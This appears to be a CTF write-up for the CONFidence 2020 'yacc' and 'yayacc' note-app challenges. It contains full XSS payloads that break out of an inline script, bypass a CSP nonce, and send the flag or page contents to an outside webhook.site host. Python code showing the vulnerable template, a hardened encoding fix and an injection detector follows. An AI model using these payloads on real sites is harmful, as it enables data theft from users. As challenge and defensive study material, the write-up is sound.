@RenwaX23
Created September 6, 2020 13:00
CONFidence CTF 2020, yacc - yayacc
CONFidence CTF 2020 - Yet Another Cat Challenge (First Blood)
Yet Another Cat Challenge for you! Just another boring add/remove/share note app, but with 8 different cats!
http://yacc.zajebistyc.tf
Solution:
POST /note HTTP/1.1
Host: yacc.zajebistyc.tf
content=x&cat_url=slaw';</script><meta+http-equiv=refresh+content=0;url="http://yacc.zajebistyc.tf/note/faf46d24-b45c-4d30-af21-95ef5f4502f7?theme=blackTheme;slaw=document.scripts[0].nonce;document.write(`\u003cscript/src=http://yacc.zajebistyc.tf/flag?var=flag%26%23x20;nonce=${slaw}\u003e\u003c/script\u003e`);setTimeout(function(){location=`https://webhook.site/x?${flag}`},1000);">
1. Use a <meta http-equiv=refresh> redirect to another note that carries the XSS payload
2. Steal the nonce with document.scripts[0].nonce
3. Create a new script element with that nonce whose src is http://yacc.zajebistyc.tf/flag?var=flag
4. Redirect to our server with the flag variable
---
CONFidence CTF 2020 - Yet Another Yet Another Cat Challenge (Fixed Version)
Yet Another Cat Challenge for you! Just another boring add/remove/share note app, but with 8 different cats!
http://yayacc.zajebistyc.tf
This is a fixed version in which the nonce can't be stolen: after the document loads, it removes itself.
Solution:
POST /note HTTP/1.1
Host: yayacc.zajebistyc.tf
content=x&cat_url=slaw';</script><meta+http-equiv=refresh+content=0;url="http://yayacc.zajebistyc.tf/note/bcb39142-d02b-4f37-b69e-85f62866f236?theme=blackTheme;let%26%23x20;x=window.open(`http://yayacc.zajebistyc.tf/flag?var=slaw`,`x`);setTimeout(function(){location=`https://webhook.site/x?jj=${x.document.body.innerHTML}`},1000);">
1. Use a <meta http-equiv=refresh> redirect to another note that carries the XSS payload
2. Open a new window pointing to http://yayacc.zajebistyc.tf/flag?var=slaw
3. Read the content of the opened window via x.document.body.innerHTML
4. Redirect to our server with the document contents
I'm not sure why this worked, because usually browsers block opening a new tab without user interaction.
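Both payloads above work because the cat_url value lands unencoded inside a single-quoted string in an inline script, so a `';</script>` prefix escapes the string and then the element itself; the CSP nonce does not help when the injection sits inside the nonced script. As an added example (not code from the writeup or the challenge app), the template shape below is assumed from the payload, and it contrasts raw interpolation with JSON-based contextual encoding plus a per-response nonce; `render_vulnerable`, `render_hardened`, the `BREAKOUT` input and the example.invalid URL are all constructed for illustration.

```python
import json
import re
import secrets

# Constructed input in the shape of the writeup's cat_url: it closes the JS
# string with ', closes the <script> element, then injects a <meta> refresh.
BREAKOUT = "slaw';</script><meta http-equiv=refresh content=0;url=https://example.invalid/>"


def make_nonce() -> str:
    """Fresh per-response CSP nonce: 128 bits from the OS CSPRNG."""
    return secrets.token_urlsafe(16)


def csp_header(nonce: str) -> str:
    """Content-Security-Policy value that only runs scripts carrying this nonce."""
    return f"script-src 'nonce-{nonce}'; object-src 'none'; base-uri 'none'"


def js_string_literal(value: str) -> str:
    """Encode a value for a JavaScript string-literal context inside <script>.
    json.dumps escapes quotes, backslashes and control characters; the extra
    replacements make '</script>' and other markup inert inside the literal."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_vulnerable(cat_url: str, nonce: str) -> str:
    """Hypothetical template in the shape the payload implies: the untrusted
    cat_url is dropped raw into a single-quoted string in the nonced script."""
    return (f'<script nonce="{nonce}">var cat = \'{cat_url}\';</script>'
            '<img id="cat">')


def render_hardened(cat_url: str, nonce: str) -> str:
    """Same template, but the untrusted value is encoded for the JS context."""
    return (f'<script nonce="{nonce}">var cat = {js_string_literal(cat_url)};</script>'
            '<img id="cat">')


def markup_after_script(page: str) -> str:
    """Everything after the first </script>: in a safe render this is only the
    template's own trailing markup, never attacker-controlled tags."""
    return page.split("</script>", 1)[1]


def has_injected_markup(page: str) -> bool:
    """True when the breakout produced a <meta> element outside the script."""
    return bool(re.search(r"<meta\b", markup_after_script(page), re.I))
```

The hardened literal still decodes to the original string in the browser, so the app's own JavaScript keeps working while the markup stays inside the string.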